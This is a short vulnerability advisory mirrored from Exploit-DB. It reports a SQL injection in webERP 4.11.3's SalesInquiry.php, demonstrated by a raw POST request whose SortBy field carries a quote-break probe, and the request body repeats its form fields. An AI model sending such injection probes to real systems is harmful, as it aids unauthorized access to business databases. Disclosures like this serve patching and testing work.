webERP 4.11.3 – ‘SalesInquiry.php?SortBy’ SQL Injection - 体验盒子

作者： HauntIT

日期： 2014-02-28

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/31989/

# ==============================================================
# Title ...| SQL Injection in webERP
# Version .| 4.11.3 
# Date ....| 28.02.2014
# Found ...| HauntIT Blog
# Home ....| http://www.weberp.org
# ==============================================================

 
# ==============================================================
# SQL Injection

---<request>---
POST /k/cms/erp/webERP/SalesInquiry.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 391

FormID=09607700a0e7ff0699503963022b5ae0944cd0bc&ReportType=Detail&OrderType=0&DateType=Order&InvoiceType=All&FromDate=01%2F02%2F2014&ToDate=28%2F02%2F2014&PartNumberOp=Equals&PartNumber=&DebtorNoOp=Equals&DebtorNo=&DebtorNameOp=LIKE&DebtorName=&OrderNo=&LineStatus=All&Category=All&Salesman=All&Area=All&SortBy= FormID=09607700a0e7ff0699503963022b5ae0944cd0bc&ReportType=Detail&OrderType=0&DateType=Order&InvoiceType=All&FromDate=01/02/2014&ToDate=28/02/2014&PartNumberOp=Equals&PartNumber=&DebtorNoOp=Equals&DebtorNo=&DebtorNameOp=LIKE&DebtorName=&OrderNo=&LineStatus=All&Category=All&Salesman=All&Area=All&SortBy='TADAAAM;]&SummaryType=orderno&submit=Run Inquiry&SummaryType=orderno&submit=Run+Inquiry
---<request>---


# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/